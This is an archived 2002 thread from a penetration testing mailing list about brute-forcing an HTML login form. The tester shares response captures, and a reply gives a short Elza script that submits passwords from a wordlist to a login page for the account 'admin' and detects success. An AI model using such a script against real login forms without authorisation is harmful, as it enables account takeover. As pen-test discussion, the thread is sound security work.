Penetration Testing mailing list archives
RE: Password HTML form bruteforce
From: "Greg" <greg () hoobie net>
Date: Sat, 20 Apr 2002 02:05:16 +0100
I'm afraid Brutus doesn't handle 302's correctly. Dodgy coding if you ask me. Why don't you try Elza (http://online.securityfocus.com/tools/1127) with this script which is based on one found in the Elza docs. Obviously change the target url and username. This script will read each string from words.txt and submit each attempt checking for the var autoredir = on subst ACCOUNT = admin proc POSITIVEAUTH print Positive Authentication with Login: ACCOUNT, Password: CURRPASS endproc POSITIVEAUTH proc ATTEMPTAUTH field userid = USERSTRING field password = PASSSTRING # Add any other form fields that need to be sent here post url http://TargetAddress/Login.cfm call POSITIVEAUTH if body = Some warm glowing message about how you're logged in now. endproc ATTEMPTAUTH call ATTEMPTAUTH PASSSTRING % words.txt In the above script, if you set 'autoredir' to off you will not be automatically redirected by the 302 and the '%location%' variable will be made available to you for examination. It might be easier to just let Elza handle the redirection and then match some known test in the body of the successful authentication page as shown above. Read the docs for Elza, you'll need to build a list of scripts up before it become really useful. cheers Greg
-----Original Message----- From: joh ket [mailto:johket () hotmail com] Sent: 18 April 2002 10:16 To: pen-test () securityfocus com Subject: Password HTML form bruteforce Hi there, I am currently involved in a pen test on a website which is using formbased authentication. I figured out that a account, named 'test' exists... (...) Now I want to brute force this account, I am using Brutus AET2 for this. But I do not know how to use the HTML response. Below the packet capture of a response of a login which was succesfull: HTTP/1.1.302.Object.Moved..Location:.start.cfm?cid= (lines deleted) <head><title>Document.Moved</title></head><body<h1>Object.Moved</h1>This.document.may.be.found.<a.HREF="start.cfm? cid= (lines deleted) A capture of an unsuccessfull capture looks like this: HTTP/1.1.302.Object.Moved..Location:.original.cfm? login=Invalid password. Please try again (lines deleted) Document.Moved</title></head>.<body><h1>Object. Moved</h1>This.document.may.be.found.<a.HREF=" original.cfm?login=Invalid password. Please try again">here</a> So depending on the password I get redirected to a page... How should the primary and the secondary repsonse be configured? Or does somebody else have a better idea how to do this? Thanks in advance! Joh Ket ------------------------------------------------------------------ ---------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Password HTML form bruteforce joh ket (Apr 18)
- Re: Password HTML form bruteforce Vladimir Parkhaev (Apr 19)
- RE: Password HTML form bruteforce Greg (Apr 22)
- RE: Password HTML form bruteforce Greg (Apr 22)